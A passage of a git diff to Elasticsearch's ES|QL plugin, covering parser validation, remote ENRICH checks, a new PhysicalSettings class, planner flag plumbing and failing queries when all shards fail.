AstBuilder::plan, configuration); } private T invokeParser( @@ -119,7 +120,8 @@ private T invokeParser( QueryParams params, PlanTelemetry metrics, Function parseFunction, - BiFunction result + BiFunction result, + Configuration configuration ) { if (query.length() > MAX_LENGTH) { throw new ParsingException("ESQL statement is too large [{} characters > {}]", query.length(), MAX_LENGTH); diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/parser/LogicalPlanBuilder.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/parser/LogicalPlanBuilder.java index a8ea1ba95dc15..7b4f971aa5f13 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/parser/LogicalPlanBuilder.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/parser/LogicalPlanBuilder.java @@ -8,7 +8,6 @@ package org.elasticsearch.xpack.esql.parser; import org.antlr.v4.runtime.ParserRuleContext; -import org.antlr.v4.runtime.Token; import org.antlr.v4.runtime.tree.ParseTree; import org.apache.lucene.util.BytesRef; import org.elasticsearch.Build; @@ -90,7 +89,6 @@ import java.util.function.Function; import static java.util.Collections.emptyList; -import static org.elasticsearch.xpack.esql.common.Failure.fail; import static org.elasticsearch.xpack.esql.core.type.DataType.KEYWORD; import static org.elasticsearch.xpack.esql.core.util.StringUtils.WILDCARD; import static org.elasticsearch.xpack.esql.expression.NamedExpressions.mergeOutputExpressions; @@ -393,21 +391,22 @@ public PlanFactory visitWhereCommand(EsqlBaseParser.WhereCommandContext ctx) { public PlanFactory visitLimitCommand(EsqlBaseParser.LimitCommandContext ctx) { Source source = source(ctx); Object val = expression(ctx.constant()).fold(FoldContext.small() /* TODO remove me */); - if (val instanceof Integer i) { - if (i < 0) { - throw new ParsingException(source, "Invalid value for LIMIT [" + i + "], expecting a non negative integer"); - } + if (val instanceof Integer i && i >= 0) { return input -> new Limit(source, new Literal(source, i, DataType.INTEGER), input); - } else { - throw new ParsingException( - source, - "Invalid value for LIMIT [" - + BytesRefs.toString(val) - + ": " - + (expression(ctx.constant()).dataType() == KEYWORD ? "String" : val.getClass().getSimpleName()) - + "], expecting a non negative integer" - ); } + + String valueType = expression(ctx.constant()).dataType().typeName(); + + throw new ParsingException( + source, + "value of [" + + source.text() + + "] must be a non negative integer, found value [" + + ctx.constant().getText() + + "] type [" + + valueType + + "]" + ); } @Override @@ -514,8 +513,15 @@ public PlanFactory visitChangePointCommand(EsqlBaseParser.ChangePointCommandCont return child -> new ChangePoint(src, child, value, key, targetType, targetPvalue); } - private static Tuple parsePolicyName(Token policyToken) { - String stringValue = policyToken.getText(); + private static Tuple parsePolicyName(EsqlBaseParser.EnrichPolicyNameContext ctx) { + String stringValue; + if (ctx.ENRICH_POLICY_NAME() != null) { + stringValue = ctx.ENRICH_POLICY_NAME().getText(); + } else { + stringValue = ctx.QUOTED_STRING().getText(); + stringValue = stringValue.substring(1, stringValue.length() - 1); + } + int index = stringValue.indexOf(":"); Mode mode = null; if (index >= 0) { @@ -527,7 +533,7 @@ private static Tuple parsePolicyName(Token policyToken) { if (mode == null) { throw new ParsingException( - source(policyToken), + source(ctx), "Unrecognized value [{}], ENRICH policy qualifier needs to be one of {}", modeValue, Arrays.stream(Mode.values()).map(s -> "_" + s).toList() diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/plan/logical/Enrich.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/plan/logical/Enrich.java index 11e9a57064e5b..413fe4d6d36ab 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/plan/logical/Enrich.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/plan/logical/Enrich.java @@ -35,9 +35,11 @@ import org.elasticsearch.xpack.esql.index.EsIndex; import org.elasticsearch.xpack.esql.io.stream.PlanStreamInput; import org.elasticsearch.xpack.esql.plan.GeneratingPlan; +import org.elasticsearch.xpack.esql.plan.logical.join.LookupJoin; import java.io.IOException; import java.util.ArrayList; +import java.util.HashSet; import java.util.List; import java.util.Locale; import java.util.Map; @@ -295,23 +297,33 @@ public BiConsumer postAnalysisPlanVerification() { * retaining the originating cluster and restructing pages for routing, which might be complicated. */ private static void checkRemoteEnrich(LogicalPlan plan, Failures failures) { - boolean[] agg = { false }; - boolean[] enrichCoord = { false }; + // First look for remote ENRICH, and then look at its children. Going over the whole plan once is trickier as remote ENRICHs can be + // in separate FORK branches which are valid by themselves. + plan.forEachUp(Enrich.class, enrich -> checkForPlansForbiddenBeforeRemoteEnrich(enrich, failures)); + } + + /** + * For a given remote {@link Enrich}, check if there are any forbidden plans upstream. + */ + private static void checkForPlansForbiddenBeforeRemoteEnrich(Enrich enrich, Failures failures) { + if (enrich.mode != Mode.REMOTE) { + return; + } + + Set badCommands = new HashSet<>(); - plan.forEachUp(UnaryPlan.class, u -> { + enrich.forEachUp(LogicalPlan.class, u -> { if (u instanceof Aggregate) { - agg[0] = true; - } else if (u instanceof Enrich enrich && enrich.mode() == Enrich.Mode.COORDINATOR) { - enrichCoord[0] = true; - } - if (u instanceof Enrich enrich && enrich.mode() == Enrich.Mode.REMOTE) { - if (agg[0]) { - failures.add(fail(enrich, "ENRICH with remote policy can't be executed after STATS")); - } - if (enrichCoord[0]) { - failures.add(fail(enrich, "ENRICH with remote policy can't be executed after another ENRICH with coordinator policy")); - } + badCommands.add("STATS"); + } else if (u instanceof Enrich upstreamEnrich && upstreamEnrich.mode() == Enrich.Mode.COORDINATOR) { + badCommands.add("another ENRICH with coordinator policy"); + } else if (u instanceof LookupJoin) { + badCommands.add("LOOKUP JOIN"); + } else if (u instanceof Fork) { + badCommands.add("FORK"); } }); + + badCommands.forEach(c -> failures.add(fail(enrich, "ENRICH with remote policy can't be executed after " + c))); } } diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/planner/EsPhysicalOperationProviders.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/planner/EsPhysicalOperationProviders.java index acf685f3dcd9c..ac63c644281dd 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/planner/EsPhysicalOperationProviders.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/planner/EsPhysicalOperationProviders.java @@ -22,15 +22,14 @@ import org.elasticsearch.compute.aggregation.GroupingAggregator; import org.elasticsearch.compute.aggregation.blockhash.BlockHash; import org.elasticsearch.compute.data.ElementType; -import org.elasticsearch.compute.lucene.DataPartitioning; import org.elasticsearch.compute.lucene.LuceneCountOperator; import org.elasticsearch.compute.lucene.LuceneOperator; import org.elasticsearch.compute.lucene.LuceneSliceQueue; import org.elasticsearch.compute.lucene.LuceneSourceOperator; import org.elasticsearch.compute.lucene.LuceneTopNSourceOperator; -import org.elasticsearch.compute.lucene.TimeSeriesExtractFieldOperator; import org.elasticsearch.compute.lucene.TimeSeriesSourceOperatorFactory; -import org.elasticsearch.compute.lucene.ValuesSourceReaderOperator; +import org.elasticsearch.compute.lucene.read.TimeSeriesExtractFieldOperator; +import org.elasticsearch.compute.lucene.read.ValuesSourceReaderOperator; import org.elasticsearch.compute.operator.Operator; import org.elasticsearch.compute.operator.OrdinalsGroupingOperator; import org.elasticsearch.compute.operator.SourceOperator; @@ -143,17 +142,17 @@ public boolean hasReferences() { } private final List shardContexts; - private final DataPartitioning defaultDataPartitioning; + private final PhysicalSettings physicalSettings; public EsPhysicalOperationProviders( FoldContext foldContext, List shardContexts, AnalysisRegistry analysisRegistry, - DataPartitioning defaultDataPartitioning + PhysicalSettings physicalSettings ) { super(foldContext, analysisRegistry); this.shardContexts = shardContexts; - this.defaultDataPartitioning = defaultDataPartitioning; + this.physicalSettings = physicalSettings; } @Override @@ -178,7 +177,10 @@ public final PhysicalOperation fieldExtractPhysicalOperation(FieldExtractExec fi // TODO: consolidate with ValuesSourceReaderOperator return source.with(new TimeSeriesExtractFieldOperator.Factory(fields, shardContexts), layout.build()); } else { - return source.with(new ValuesSourceReaderOperator.Factory(fields, readers, docChannel), layout.build()); + return source.with( + new ValuesSourceReaderOperator.Factory(physicalSettings.valuesLoadingJumboSize(), fields, readers, docChannel), + layout.build() + ); } } @@ -281,7 +283,7 @@ public final PhysicalOperation sourcePhysicalOperation(EsQueryExec esQueryExec, luceneFactory = new LuceneTopNSourceOperator.Factory( shardContexts, querySupplier(esQueryExec.query()), - context.queryPragmas().dataPartitioning(defaultDataPartitioning), + context.queryPragmas().dataPartitioning(physicalSettings.defaultDataPartitioning()), context.queryPragmas().taskConcurrency(), context.pageSize(rowEstimatedSize), limit, @@ -292,7 +294,7 @@ public final PhysicalOperation sourcePhysicalOperation(EsQueryExec esQueryExec, luceneFactory = new LuceneSourceOperator.Factory( shardContexts, querySupplier(esQueryExec.query()), - context.queryPragmas().dataPartitioning(defaultDataPartitioning), + context.queryPragmas().dataPartitioning(physicalSettings.defaultDataPartitioning()), context.queryPragmas().taskConcurrency(), context.pageSize(rowEstimatedSize), limit, @@ -344,7 +346,7 @@ public LuceneCountOperator.Factory countSource(LocalExecutionPlannerContext cont return new LuceneCountOperator.Factory( shardContexts, querySupplier(queryBuilder), - context.queryPragmas().dataPartitioning(defaultDataPartitioning), + context.queryPragmas().dataPartitioning(physicalSettings.defaultDataPartitioning()), context.queryPragmas().taskConcurrency(), limit == null ? NO_LIMIT : (Integer) limit.fold(context.foldCtx()) ); @@ -566,8 +568,8 @@ public ColumnAtATimeReader columnAtATimeReader(LeafReaderContext context) throws } return new ColumnAtATimeReader() { @Override - public Block read(BlockFactory factory, Docs docs) throws IOException { - Block block = reader.read(factory, docs); + public Block read(BlockFactory factory, Docs docs, int offset) throws IOException { + Block block = reader.read(factory, docs, offset); return typeConverter.convert((org.elasticsearch.compute.data.Block) block); } diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/planner/PhysicalSettings.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/planner/PhysicalSettings.java new file mode 100644 index 0000000000000..4276eeaf39f9b --- /dev/null +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/planner/PhysicalSettings.java @@ -0,0 +1,64 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ + +package org.elasticsearch.xpack.esql.planner; + +import org.elasticsearch.cluster.service.ClusterService; +import org.elasticsearch.common.settings.Setting; +import org.elasticsearch.common.unit.ByteSizeValue; +import org.elasticsearch.common.unit.MemorySizeValue; +import org.elasticsearch.compute.lucene.DataPartitioning; +import org.elasticsearch.monitor.jvm.JvmInfo; + +/** + * Values for cluster level settings used in physical planning. + */ +public class PhysicalSettings { + public static final Setting DEFAULT_DATA_PARTITIONING = Setting.enumSetting( + DataPartitioning.class, + "esql.default_data_partitioning", + DataPartitioning.AUTO, + Setting.Property.NodeScope, + Setting.Property.Dynamic + ); + + public static final Setting VALUES_LOADING_JUMBO_SIZE = new Setting<>("esql.values_loading_jumbo_size", settings -> { + long proportional = JvmInfo.jvmInfo().getMem().getHeapMax().getBytes() / 1024; + return ByteSizeValue.ofBytes(Math.max(proportional, ByteSizeValue.ofMb(1).getBytes())).getStringRep(); + }, + s -> MemorySizeValue.parseBytesSizeValueOrHeapRatio(s, "esql.values_loading_jumbo_size"), + Setting.Property.NodeScope, + Setting.Property.Dynamic + ); + + private volatile DataPartitioning defaultDataPartitioning; + private volatile ByteSizeValue valuesLoadingJumboSize; + + /** + * Ctor for prod that listens for updates from the {@link ClusterService}. + */ + public PhysicalSettings(ClusterService clusterService) { + clusterService.getClusterSettings().initializeAndWatch(DEFAULT_DATA_PARTITIONING, v -> this.defaultDataPartitioning = v); + clusterService.getClusterSettings().initializeAndWatch(VALUES_LOADING_JUMBO_SIZE, v -> this.valuesLoadingJumboSize = v); + } + + /** + * Ctor for testing. + */ + public PhysicalSettings(DataPartitioning defaultDataPartitioning, ByteSizeValue valuesLoadingJumboSize) { + this.defaultDataPartitioning = defaultDataPartitioning; + this.valuesLoadingJumboSize = valuesLoadingJumboSize; + } + + public DataPartitioning defaultDataPartitioning() { + return defaultDataPartitioning; + } + + public ByteSizeValue valuesLoadingJumboSize() { + return valuesLoadingJumboSize; + } +} diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/planner/PlannerUtils.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/planner/PlannerUtils.java index 07771a6360625..48cfa24bec069 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/planner/PlannerUtils.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/planner/PlannerUtils.java @@ -7,6 +7,7 @@ package org.elasticsearch.xpack.esql.planner; +import org.elasticsearch.TransportVersion; import org.elasticsearch.common.Strings; import org.elasticsearch.common.breaker.NoopCircuitBreaker; import org.elasticsearch.common.util.BigArrays; @@ -25,11 +26,13 @@ import org.elasticsearch.xpack.esql.core.expression.Expression; import org.elasticsearch.xpack.esql.core.expression.FoldContext; import org.elasticsearch.xpack.esql.core.expression.MetadataAttribute; +import org.elasticsearch.xpack.esql.core.querydsl.query.Query; import org.elasticsearch.xpack.esql.core.tree.Source; import org.elasticsearch.xpack.esql.core.type.DataType; import org.elasticsearch.xpack.esql.core.util.Holder; import org.elasticsearch.xpack.esql.core.util.Queries; import org.elasticsearch.xpack.esql.expression.predicate.Predicates; +import org.elasticsearch.xpack.esql.io.stream.PlanStreamWrapperQueryBuilder; import org.elasticsearch.xpack.esql.optimizer.LocalLogicalOptimizerContext; import org.elasticsearch.xpack.esql.optimizer.LocalLogicalPlanOptimizer; import org.elasticsearch.xpack.esql.optimizer.LocalPhysicalOptimizerContext; @@ -49,6 +52,7 @@ import org.elasticsearch.xpack.esql.plan.physical.PhysicalPlan; import org.elasticsearch.xpack.esql.planner.mapper.LocalMapper; import org.elasticsearch.xpack.esql.planner.mapper.Mapper; +import org.elasticsearch.xpack.esql.plugin.EsqlFlags; import org.elasticsearch.xpack.esql.session.Configuration; import org.elasticsearch.xpack.esql.stats.SearchContextStats; import org.elasticsearch.xpack.esql.stats.SearchStats; @@ -116,6 +120,8 @@ public static PhysicalPlan reductionPlan(PhysicalPlan plan) { } final FragmentExec fragment = (FragmentExec) fragments.getFirst(); + // Though FORK is technically a pipeline breaker, it should never show up here. + // See also: https://github.com/elastic/elasticsearch/pull/131945/files#r2235572935 final var pipelineBreakers = fragment.fragment().collectFirstChildren(Mapper::isPipelineBreaker); if (pipelineBreakers.isEmpty()) { return null; @@ -162,17 +168,26 @@ private static void forEachRelation(PhysicalPlan plan, Consumer acti } public static PhysicalPlan localPlan( + EsqlFlags flags, List searchContexts, Configuration configuration, FoldContext foldCtx, PhysicalPlan plan ) { - return localPlan(configuration, foldCtx, plan, SearchContextStats.from(searchContexts)); + return localPlan(flags, configuration, foldCtx, plan, SearchContextStats.from(searchContexts)); } - public static PhysicalPlan localPlan(Configuration configuration, FoldContext foldCtx, PhysicalPlan plan, SearchStats searchStats) { + public static PhysicalPlan localPlan( + EsqlFlags flags, + Configuration configuration, + FoldContext foldCtx, + PhysicalPlan plan, + SearchStats searchStats + ) { final var logicalOptimizer = new LocalLogicalPlanOptimizer(new LocalLogicalOptimizerContext(configuration, foldCtx, searchStats)); - var physicalOptimizer = new LocalPhysicalPlanOptimizer(new LocalPhysicalOptimizerContext(configuration, foldCtx, searchStats)); + var physicalOptimizer = new LocalPhysicalPlanOptimizer( + new LocalPhysicalOptimizerContext(flags, configuration, foldCtx, searchStats) + ); return localPlan(plan, logicalOptimizer, physicalOptimizer); } @@ -212,8 +227,13 @@ public static PhysicalPlan localPlan( /** * Extracts a filter that can be used to skip unmatched shards on the coordinator. */ - public static QueryBuilder canMatchFilter(PhysicalPlan plan) { - return detectFilter(plan, CoordinatorRewriteContext.SUPPORTED_FIELDS::contains); + public static QueryBuilder canMatchFilter( + EsqlFlags flags, + Configuration configuration, + TransportVersion minTransportVersion, + PhysicalPlan plan + ) { + return detectFilter(flags, configuration, minTransportVersion, plan, CoordinatorRewriteContext.SUPPORTED_FIELDS::contains); } /** @@ -221,11 +241,20 @@ public static QueryBuilder canMatchFilter(PhysicalPlan plan) { * We currently only use this filter for the @timestamp field, which is always a date field. Any tests that wish to use this should * take care to not use it with TEXT fields. */ - static QueryBuilder detectFilter(PhysicalPlan plan, Predicate fieldName) { + static QueryBuilder detectFilter( + EsqlFlags flags, + Configuration configuration, + TransportVersion minTransportVersion, + PhysicalPlan plan, + Predicate fieldName + ) { // first position is the REST filter, the second the query filter final List requestFilters = new ArrayList<>(); + final LucenePushdownPredicates ctx = LucenePushdownPredicates.forCanMatch(minTransportVersion, flags); plan.forEachDown(FragmentExec.class, fe -> { - requestFilters.add(fe.esFilter()); + if (fe.esFilter() != null && fe.esFilter().supportsVersion(minTransportVersion)) { + requestFilters.add(fe.esFilter()); + } // detect filter inside the query fe.fragment().forEachUp(Filter.class, f -> { // the only filter that can be pushed down is that on top of the relation @@ -243,15 +272,18 @@ static QueryBuilder detectFilter(PhysicalPlan plan, Predicate fieldName) // and the expression is pushable (functions can be fully translated) if (matchesField && refsBuilder.isEmpty() - && translatable(exp, LucenePushdownPredicates.DEFAULT).finish() == TranslationAware.FinishedTranslatable.YES) { + && translatable(exp, ctx).finish() == TranslationAware.FinishedTranslatable.YES) { matches.add(exp); } } } if (matches.isEmpty() == false) { - requestFilters.add( - TRANSLATOR_HANDLER.asQuery(LucenePushdownPredicates.DEFAULT, Predicates.combineAnd(matches)).toQueryBuilder() - ); + Query qlQuery = TRANSLATOR_HANDLER.asQuery(ctx, Predicates.combineAnd(matches)); + QueryBuilder builder = qlQuery.toQueryBuilder(); + if (qlQuery.containsPlan()) { + builder = new PlanStreamWrapperQueryBuilder(configuration, builder); + } + requestFilters.add(builder); } }); }); diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/planner/TypeConverter.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/planner/TypeConverter.java index 4dea8a50b5c17..f18463b28a94e 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/planner/TypeConverter.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/planner/TypeConverter.java @@ -46,6 +46,11 @@ public org.elasticsearch.compute.data.Block eval(Page page) { return page.getBlock(0); } + @Override + public long baseRamBytesUsed() { + throw new UnsupportedOperationException("not used"); + } + @Override public void close() {} }; diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/planner/mapper/Mapper.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/planner/mapper/Mapper.java index 137a2118b0d54..afda53697d5a2 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/planner/mapper/Mapper.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/planner/mapper/Mapper.java @@ -88,7 +88,7 @@ private PhysicalPlan mapUnary(UnaryPlan unary) { PhysicalPlan mappedChild = map(unary.child()); // - // TODO - this is hard to follow and needs reworking + // TODO - this is hard to follow, causes bugs and needs reworking // https://github.com/elastic/elasticsearch/issues/115897 // if (unary instanceof Enrich enrich && enrich.mode() == Enrich.Mode.REMOTE) { diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/plugin/ClusterComputeHandler.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/plugin/ClusterComputeHandler.java index cd4ff13700515..4e8a89d024b71 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/plugin/ClusterComputeHandler.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/plugin/ClusterComputeHandler.java @@ -166,7 +166,7 @@ private void updateExecutionInfo(EsqlExecutionInfo executionInfo, String cluster builder.setTook(executionInfo.tookSoFar()); } if (v.getStatus() == EsqlExecutionInfo.Cluster.Status.RUNNING) { - builder.setFailures(resp.failures); + builder.addFailures(resp.failures); if (executionInfo.isStopped() || resp.failedShards > 0 || resp.failures.isEmpty() == false) { builder.setStatus(EsqlExecutionInfo.Cluster.Status.PARTIAL); } else { @@ -250,6 +250,7 @@ void runComputeOnRemoteCluster( final String localSessionId = clusterAlias + ":" + globalSessionId; final PhysicalPlan coordinatorPlan = ComputeService.reductionPlan(plan, true); final AtomicReference finalResponse = new AtomicReference<>(); + final EsqlFlags flags = computeService.createFlags(); final long startTimeInNanos = System.nanoTime(); final Runnable cancelQueryOnFailure = computeService.cancelQueryOnFailure(parentTask); try (var computeListener = new ComputeListener(transportService.getThreadPool(), cancelQueryOnFailure, listener.map(profiles -> { @@ -269,6 +270,7 @@ void runComputeOnRemoteCluster( localSessionId, "remote_reduce", clusterAlias, + flags, List.of(), configuration, configuration.newFoldContext(), @@ -282,6 +284,7 @@ void runComputeOnRemoteCluster( localSessionId, clusterAlias, parentTask, + flags, configuration, plan, concreteIndices, diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/plugin/ComputeContext.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/plugin/ComputeContext.java index dd94c52263235..d771de83685eb 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/plugin/ComputeContext.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/plugin/ComputeContext.java @@ -21,6 +21,7 @@ record ComputeContext( String sessionId, String description, String clusterAlias, + EsqlFlags flags, List searchContexts, Configuration configuration, FoldContext foldCtx, diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/plugin/ComputeService.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/plugin/ComputeService.java index 4adc97d28fee0..d12799ab8b170 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/plugin/ComputeService.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/plugin/ComputeService.java @@ -7,6 +7,7 @@ package org.elasticsearch.xpack.esql.plugin; +import org.elasticsearch.ExceptionsHelper; import org.elasticsearch.action.ActionListener; import org.elasticsearch.action.OriginalIndices; import org.elasticsearch.action.search.SearchRequest; @@ -18,7 +19,6 @@ import org.elasticsearch.common.util.concurrent.RunOnce; import org.elasticsearch.compute.data.BlockFactory; import org.elasticsearch.compute.data.Page; -import org.elasticsearch.compute.lucene.DataPartitioning; import org.elasticsearch.compute.operator.DriverCompletionInfo; import org.elasticsearch.compute.operator.DriverTaskRunner; import org.elasticsearch.compute.operator.FailureCollector; @@ -59,6 +59,7 @@ import org.elasticsearch.xpack.esql.plan.physical.PhysicalPlan; import org.elasticsearch.xpack.esql.planner.EsPhysicalOperationProviders; import org.elasticsearch.xpack.esql.planner.LocalExecutionPlanner; +import org.elasticsearch.xpack.esql.planner.PhysicalSettings; import org.elasticsearch.xpack.esql.planner.PlannerUtils; import org.elasticsearch.xpack.esql.session.Configuration; import org.elasticsearch.xpack.esql.session.EsqlCCSUtils; @@ -137,8 +138,7 @@ public class ComputeService { private final DataNodeComputeHandler dataNodeComputeHandler; private final ClusterComputeHandler clusterComputeHandler; private final ExchangeService exchangeService; - - private volatile DataPartitioning defaultDataPartitioning; + private final PhysicalSettings physicalSettings; @SuppressWarnings("this-escape") public ComputeService( @@ -177,12 +177,13 @@ public ComputeService( esqlExecutor, dataNodeComputeHandler ); - clusterService.getClusterSettings().initializeAndWatch(EsqlPlugin.DEFAULT_DATA_PARTITIONING, v -> this.defaultDataPartitioning = v); + this.physicalSettings = new PhysicalSettings(clusterService); } public void execute( String sessionId, CancellableTask rootTask, + EsqlFlags flags, PhysicalPlan physicalPlan, Configuration configuration, FoldContext foldContext, @@ -195,7 +196,7 @@ public void execute( // we have no sub plans, so we can just execute the given plan if (subplans == null || subplans.isEmpty()) { - executePlan(sessionId, rootTask, physicalPlan, configuration, foldContext, execInfo, null, listener, null); + executePlan(sessionId, rootTask, flags, physicalPlan, configuration, foldContext, execInfo, null, listener, null); return; } @@ -222,6 +223,7 @@ public void execute( mainSessionId, "main.final", LOCAL_CLUSTER, + flags, List.of(), configuration, foldContext, @@ -254,6 +256,7 @@ public void execute( executePlan( childSessionId, rootTask, + flags, subplan, configuration, foldContext, @@ -278,6 +281,7 @@ public void execute( public void executePlan( String sessionId, CancellableTask rootTask, + EsqlFlags flags, PhysicalPlan physicalPlan, Configuration configuration, FoldContext foldContext, @@ -322,6 +326,7 @@ public void executePlan( newChildSession(sessionId), profileDescription(profileQualifier, "single"), LOCAL_CLUSTER, + flags, List.of(), configuration, foldContext, @@ -370,9 +375,10 @@ public void executePlan( var computeListener = new ComputeListener( transportService.getThreadPool(), cancelQueryOnFailure, - listener.map(completionInfo -> { + listener.delegateFailureAndWrap((l, completionInfo) -> { + failIfAllShardsFailed(execInfo, collectedPages); execInfo.markEndQuery(); // TODO: revisit this time recording model as part of INLINESTATS improvements - return new Result(outputAttributes, collectedPages, completionInfo, execInfo); + l.onResponse(new Result(outputAttributes, collectedPages, completionInfo, execInfo)); }) ) ) { @@ -390,9 +396,13 @@ public void executePlan( var builder = new EsqlExecutionInfo.Cluster.Builder(v).setTook(tookTime); if (v.getStatus() == EsqlExecutionInfo.Cluster.Status.RUNNING) { final Integer failedShards = execInfo.getCluster(LOCAL_CLUSTER).getFailedShards(); - var status = localClusterWasInterrupted.get() || (failedShards != null && failedShards > 0) - ? EsqlExecutionInfo.Cluster.Status.PARTIAL - : EsqlExecutionInfo.Cluster.Status.SUCCESSFUL; + // Set the local cluster status (including the final driver) to partial if the query was stopped + // or encountered resolution or execution failures. + var status = localClusterWasInterrupted.get() + || (failedShards != null && failedShards > 0) + || v.getFailures().isEmpty() == false + ? EsqlExecutionInfo.Cluster.Status.PARTIAL + : EsqlExecutionInfo.Cluster.Status.SUCCESSFUL; builder.setStatus(status); } return builder.build(); @@ -408,6 +418,7 @@ public void executePlan( sessionId, profileDescription(profileQualifier, "final"), LOCAL_CLUSTER, + flags, List.of(), configuration, foldContext, @@ -424,6 +435,7 @@ public void executePlan( sessionId, LOCAL_CLUSTER, rootTask, + flags, configuration, dataNodePlan, Set.of(localConcreteIndices.indices()), @@ -438,7 +450,7 @@ public void executePlan( .setSuccessfulShards(r.getSuccessfulShards()) .setSkippedShards(r.getSkippedShards()) .setFailedShards(r.getFailedShards()) - .setFailures(r.failures) + .addFailures(r.failures) .build() ); dataNodesListener.onResponse(r.getCompletionInfo()); @@ -448,7 +460,7 @@ public void executePlan( LOCAL_CLUSTER, (k, v) -> new EsqlExecutionInfo.Cluster.Builder(v).setStatus( EsqlExecutionInfo.Cluster.Status.PARTIAL - ).setFailures(List.of(new ShardSearchFailure(e))).build() + ).addFailures(List.of(new ShardSearchFailure(e))).build() ); dataNodesListener.onResponse(DriverCompletionInfo.EMPTY); } else { @@ -529,6 +541,47 @@ private static void updateExecutionInfoAfterCoordinatorOnlyQuery(EsqlExecutionIn } } + /** + * If all of target shards excluding the skipped shards failed from the local or remote clusters, then we should fail the entire query + * regardless of the partial_results configuration or skip_unavailable setting. This behavior doesn't fully align with the search API, + * which doesn't consider the failures from the remote clusters when skip_unavailable is true. + */ + static void failIfAllShardsFailed(EsqlExecutionInfo execInfo, List finalResults) { + // do not fail if any final result has results + if (finalResults.stream().anyMatch(p -> p.getPositionCount() > 0)) { + return; + } + int totalFailedShards = 0; + for (EsqlExecutionInfo.Cluster cluster : execInfo.clusterInfo.values()) { + final Integer successfulShards = cluster.getSuccessfulShards(); + if (successfulShards != null && successfulShards > 0) { + return; + } + if (cluster.getFailedShards() != null) { + totalFailedShards += cluster.getFailedShards(); + } + } + if (totalFailedShards == 0) { + return; + } + final var failureCollector = new FailureCollector(); + for (EsqlExecutionInfo.Cluster cluster : execInfo.clusterInfo.values()) { + var failedShards = cluster.getFailedShards(); + if (failedShards != null && failedShards > 0) { + assert cluster.getFailures().isEmpty() == false : "expected failures for cluster [" + cluster.getClusterAlias() + "]"; + for (ShardSearchFailure failure : cluster.getFailures()) { + if (failure.getCause() instanceof Exception e) { + failureCollector.unwrapAndCollect(e); + } else { + assert false : "unexpected failure: " + new AssertionError(failure.getCause()); + failureCollector.unwrapAndCollect(failure); + } + } + } + } + ExceptionsHelper.reThrowIfNotNull(failureCollector.getFailure()); + } + void runCompute(CancellableTask task, ComputeContext context, PhysicalPlan plan, ActionListener listener) { listener = ActionListener.runBefore(listener, () -> Releasables.close(context.searchContexts())); List contexts = new ArrayList<>(context.searchContexts().size()); @@ -554,7 +607,7 @@ public SourceProvider createSourceProvider() { context.foldCtx(), contexts, searchService.getIndicesService().getAnalysis(), - defaultDataPartitioning + physicalSettings ); try { LocalExecutionPlanner planner = new LocalExecutionPlanner( @@ -576,7 +629,13 @@ public SourceProvider createSourceProvider() { LOGGER.debug("Received physical plan:\n{}", plan); - var localPlan = PlannerUtils.localPlan(context.searchExecutionContexts(), context.configuration(), context.foldCtx(), plan); + var localPlan = PlannerUtils.localPlan( + context.flags(), + context.searchExecutionContexts(), + context.configuration(), + context.foldCtx(), + plan + ); // the planner will also set the driver parallelism in LocalExecutionPlanner.LocalExecutionPlan (used down below) // it's doing this in the planning of EsQueryExec (the source of the data) // see also EsPhysicalOperationProviders.sourcePhysicalOperation @@ -592,23 +651,36 @@ public SourceProvider createSourceProvider() { throw new IllegalStateException("no drivers created"); } LOGGER.debug("using {} drivers", drivers.size()); - driverRunner.executeDrivers( - task, - drivers, - transportService.getThreadPool().executor(ESQL_WORKER_THREAD_POOL_NAME), - ActionListener.releaseAfter(listener.map(ignored -> { - if 